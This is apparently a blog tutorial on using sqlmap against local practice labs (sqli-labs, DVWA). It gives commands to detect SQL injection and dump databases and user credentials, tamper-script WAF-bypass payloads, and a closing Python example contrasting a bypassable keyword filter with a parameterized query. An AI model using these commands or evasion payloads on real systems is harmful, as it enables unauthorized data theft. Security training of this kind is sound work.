SQL injection: using sqlmap

Basic sqlmap usage

Given a URL:
http://localhost/sqli-labs-master/Less-1/?id=1
Check whether it is injectable:
python sqlmap.py -u "http://localhost/sqli-labs-master/Less-1/?id=1"
GET injection
View all databases: python sqlmap.py -u "http://localhost/sqli-labs-master/Less-1/?id=1" --dbs
View the database currently in use: python sqlmap.py -u "http://localhost/sqli-labs-master/Less-1/?id=1" --current-db
View the current user: python sqlmap.py -u "http://localhost/sqli-labs-master/Less-1/?id=1" --current-user
View the tables: python sqlmap.py -u "http://localhost/sqli-labs-master/Less-1/?id=1" -D security --tables
View the column names: python sqlmap.py -u "http://localhost/sqli-labs-master/Less-1/?id=1" -D security -T users --columns
View the data: python sqlmap.py -u "http://localhost/sqli-labs-master/Less-1/?id=1" -D security -T users -C username,password --dump

POST injection

Specify the POST data: python sqlmap.py -u "http://localhost/DVWA-master/vulnerabilities/sqli/" --data "post data"
The remaining arguments are the same as for GET.
Cookie injection
Specify the cookie: python sqlmap.py -u "http://localhost/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie "... cookie value"
The remaining arguments are the same as for GET.
If sqlmap does not test the cookie parameters, try raising the level: --level 1-5
POST and cookie example:
Command:
python sqlmap.py -u "http://localhost/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit" --data "id=1&Submit=Submit" --cookie "security=medium; Phpstorm-59ffdf3e=b96b8d81-1a28-4172-9cfd-0c102f180bc5; PHPSESSID=od9ogfo1ej1f0auccbp96edt02" --current-db

Bypassing a WAF with sqlmap's tamper mechanism

Introduction
sqlmap's tamper directory ships many practical filter-evasion scripts. With the built-in tamper scripts, or ones you write yourself (path: sqlmap installation directory\tamper), the WAF bypass can be automated.
Usage
Specify a script:
--tamper "script name" (for example "apostrophemask")
Example: python sqlmap.py -u "http://localhost/sqli-labs-master/Less-1/?id=1" --tamper "script name"
Common scripts:
apostrophemask.py:
replaces the apostrophe with its UTF-8 full-width counterpart -> ("1 AND '1'='1") '1 AND %EF%BC%871%EF%BC%87=%EF%BC%871'
base64encode.py:
replaces the payload with its base64 encoding -> ("1' AND SLEEP(5)#") 'MScgQU5EIFNMRUVQKDUpIw=='
multiplespaces.py:
adds multiple spaces around SQL keywords -> ('1 UNION SELECT foobar') '1     UNION     SELECT     foobar'
space2plus.py:
replaces spaces with + -> ('SELECT id FROM users') 'SELECT+id+FROM+users'
nonrecursivereplacement.py:
double-writes keywords: replaces predefined SQL keywords with a form suited to replacement filters (e.g. .replace("SELECT", "")) -> ('1 UNION SELECT 2--') '1 UNIOUNIONN SELESELECTCT 2--'
space2randomblank.py:
replaces the space character (" ") with a random blank character from a valid set of alternatives -> ('SELECT id FROM users') 'SELECT%0Did%0DFROM%0Ausers'
unionalltounion.py:
replaces UNION ALL SELECT with UNION SELECT -> ('-1 UNION ALL SELECT') '-1 UNION SELECT'
securesphere.py:
appends a special string -> ('1 AND 1=1') "1 AND 1=1 and '0having'='0having'"
Example:
Command:
python sqlmap.py -u "http://localhost/sqli-labs-master/Less-21/index.php" --cookie "uname=ADMIN" -p uname --tamper "base64encode" --level 5 --dbms mysql
Writing your own script:
Example:
Write a script named 2or2and that double-writes "or" and "and".
Run it:
python sqlmap.py -u "http://localhost/sqli-labs-master/Less-25/?id=1" --tamper 2or2and --dbs
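Double-written keywords (nonrecursivereplacement.py and the 2or2and script) get through because a filter that deletes keywords in a single pass rebuilds the keyword from what is left. The sketch below is an added example, not code from the original post: the table, the filter and all function names are assumptions, and the data is constructed. It puts the filtered, string-built query beside a parameterized one.

```python
import re
import sqlite3

# Constructed sample data: an in-memory table standing in for a users table.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, username TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)", [(1, "admin"), (2, "guest")])
    return db

def strip_keywords_once(value):
    """Hypothetical blacklist filter: deletes 'or'/'and' in one left-to-right pass."""
    return re.sub(r"or|and", "", value, flags=re.IGNORECASE)

def lookup_filtered(db, raw_id):
    """Weak form: filter the input, then splice it into the SQL text."""
    sql = "SELECT username FROM users WHERE id = " + strip_keywords_once(raw_id)
    return db.execute(sql).fetchall()

def lookup_parameterized(db, raw_id):
    """Corrected form: the input is bound as data and never parsed as SQL."""
    return db.execute("SELECT username FROM users WHERE id = ?", (raw_id,)).fetchall()

if __name__ == "__main__":
    db = make_db()
    doubled = "0 oorr 1=1"  # constructed input with the keyword double-written
    print(repr(strip_keywords_once(doubled)))  # the filter rebuilds the keyword
    print(lookup_filtered(db, doubled))        # every row comes back
    print(lookup_parameterized(db, doubled))   # no row matches the literal string
    print(lookup_parameterized(db, "1"))       # a normal lookup still works
```

The fix is on the query side: once the value is bound as a parameter, no keyword filter is needed and no tamper encoding changes how the statement is parsed.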


Origin blog.csdn.net/wsnbbz/article/details/104269461